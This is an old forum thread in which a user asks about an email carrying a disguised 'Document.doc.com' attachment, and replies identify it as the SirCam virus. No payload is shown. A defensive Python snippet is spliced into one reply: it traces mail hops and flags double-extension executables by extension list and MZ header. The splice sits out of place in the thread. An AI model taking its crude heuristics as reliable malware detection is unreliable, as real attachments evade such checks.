
Thread: Urgent. Please Help!

  1. #1

    Thread Starter
    Dazed Member
    Join Date
    Oct 1999
    Location
    Ridgefield Park, NJ
    Posts
    3,418

    Urgent. Please Help!

    Ok I got your attention. I just received a
    virus in my email and this has never happened
    to me before. The web address is unfamiliar to me.
    Is there any way that I can trace where it originated from?

    And I was able to view the contents of
    the file using an option hotmail provides.
    Does this look like compiled source code to you?
    I haven't a clue. Thanks all.



    From [email protected] Wed, 07 Nov 2001 04:39:28 -0800
    Received: from [12.26.191.39] by hotmail.com (3.2) with ESMTP id MHotMailBDB276640034400437230C1ABF270E7E0; Wed, 07 Nov 2001 04:39:09 -0800
    Received: from node5 (210.212.157.254) by mail_server with SMTP; Wed, 7 Nov 2001 07:38:49 -0800
    From: "sachet"<[email protected]>
    To: [email protected]
    Subject: Document
    date: Wed, 7 Nov 2001 18:07:30 +0530
    MIME-Version: 1.0
    X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
    X-Mailer: Microsoft Outlook Express 5.50.4133.2400
    Content-Type: multipart/mixed; boundary="----3647B4BD_Outlook_Express_message_boundary"
    Content-Disposition: Multipart message

    ------3647B4BD_Outlook_Express_message_boundary
    Content-Type: text/plain; charset=ISO-8859-1
    Content-Transfer-Encoding: quoted-printable
    Content-Disposition: message text

    Hi! How are you=3F

    I send you this file in order to have your advice

    See you later=2E Thanks

    ------3647B4BD_Outlook_Express_message_boundary
    Content-Type: application/mixed; name=Document.doc.com
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename=Document.doc.com

    ------3647B4BD_Outlook_Express_message_boundary

  2. #2
    PowerPoster
    Join Date
    Jul 1999
    Posts
    5,923
    There's not a great deal you can do about

    Just be thankful it didn't infect you

  3. #3

  4. #4
    PowerPoster
    Join Date
    Jul 1999
    Posts
    5,923
    must be

    Ascii representation of assembler perhaps

  5. #5
    Lively Member
    Join Date
    Jun 2001
    Location
    Banana Republic
    Posts
    115
    That's just a simple com executable (attachment) disguised as a doc document.
    The purpose of the executable is to propagate by sending itself to several others in your contacts list.

    I have received them several times in the past few months, but never opened them.
    Marriage - is not a word, but a sentence.
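The double-extension disguise described in this post, and the thread starter's question about tracing the origin, as an added example that is not part of the thread. The function names, the extension list and the sample message (documentation-range addresses, a bare "MZ" payload) are constructed for illustration.

```python
import base64
import email
import re
from email import policy

# Extensions Windows runs directly (illustrative subset).
EXECUTABLE_EXTS = {"com", "exe", "pif", "scr", "bat", "lnk"}
# Constructed payload: a bare DOS "MZ" header, not the thread's attachment.
_PAYLOAD = base64.b64encode(b"MZ" + bytes(62)).decode()
# Constructed message modelled on the quoted one; documentation-range addresses.
SAMPLE = f"""\
Received: from [192.0.2.10] by mx.example.net with ESMTP; Wed, 07 Nov 2001 04:39:09 -0800
Received: from node5 (198.51.100.7) by mail_server with SMTP; Wed, 7 Nov 2001 07:38:49 -0800
From: "sender" <sender@example.org>
Subject: Document
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain

Hi! How are you?
--BOUNDARY
Content-Type: application/octet-stream; name=Document.doc.com
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=Document.doc.com

{_PAYLOAD}
--BOUNDARY--
"""

def received_hops(msg):
    """IPv4 addresses from Received headers, oldest hop first."""
    hops = []
    for header in reversed(msg.get_all("Received", [])):
        hops += re.findall(r"\b\d{1,3}(?:\.\d{1,3}){3}\b", str(header))
    return hops

def suspicious_attachments(msg):
    """(filename, double_extension, mz_header) for every attachment."""
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        pieces = name.split(".")
        data = part.get_payload(decode=True) or b""
        double_ext = len(pieces) >= 3 and pieces[-1] in EXECUTABLE_EXTS
        findings.append((name, double_ext, data[:2] == b"MZ"))
    return findings

MSG = email.message_from_string(SAMPLE, policy=policy.default)
```

Received lines below the one stamped by your own mail provider are written by upstream hosts and can be forged, so treat the earlier hops as leads rather than proof of origin.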

  6. #6
    The body sounds familiar, like a SirCam or something.

  7. #7

    Thread Starter
    Dazed Member
    Join Date
    Oct 1999
    Location
    Ridgefield Park, NJ
    Posts
    3,418
    So the text is really nothing since it is actually a .doc? Would that be right? How could I get to the underlying program and could I decompile it? Thanks

  8. #8
    Lively Member
    Join Date
    Jun 2001
    Location
    Banana Republic
    Posts
    115
    It's not a doc...delete it !!!
    Marriage - is not a word, but a sentence.

  9. #9
    Retired VBF Adm1nistrator plenderj's Avatar
    Join Date
    Jan 2001
    Location
    Dublin, Ireland
    Posts
    10,359
    That's the sircam virus
    Microsoft MVP : Visual Developer - Visual Basic [2004-2005]

  10. #10

  11. #11

  12. #12
    Retired VBF Adm1nistrator plenderj's Avatar
    Join Date
    Jan 2001
    Location
    Dublin, Ireland
    Posts
    10,359
    No, that's the sircam virus.
    Microsoft MVP : Visual Developer - Visual Basic [2004-2005]

  13. #13

  14. #14
    Retired VBF Adm1nistrator plenderj's Avatar
    Join Date
    Jan 2001
    Location
    Dublin, Ireland
    Posts
    10,359
    How many times do I have to say this... the body of that message is the sircam virus, and the way the attachment is named also indicates sircam.
    If McAfee call it otherwise, then they're wrong.
    Microsoft MVP : Visual Developer - Visual Basic [2004-2005]

  15. #15

    Thread Starter
    Dazed Member
    Join Date
    Oct 1999
    Location
    Ridgefield Park, NJ
    Posts
    3,418
    No need to get your feathers in a ruffle. I'm just saying what they say. I could care less what the name is or what type of virus it is.

  16. #16
    Retired VBF Adm1nistrator plenderj's Avatar
    Join Date
    Jan 2001
    Location
    Dublin, Ireland
    Posts
    10,359
    Originally posted by chrisjk
    no offense Jamie, but I think mcafee know more about viri than you do
    Yeah they probably do, but I remember distinctly that virus.
    I had to take it out of two infected sites, and it's a pain in the hole.

    http://vil.nai.com/vil/virusSummary.asp?virus_k=99141


    [edit]
    This is the funlove virus :
    http://vil.nai.com/vil/virusSummary.asp?virus_k=10419
    [/edit]
    Microsoft MVP : Visual Developer - Visual Basic [2004-2005]
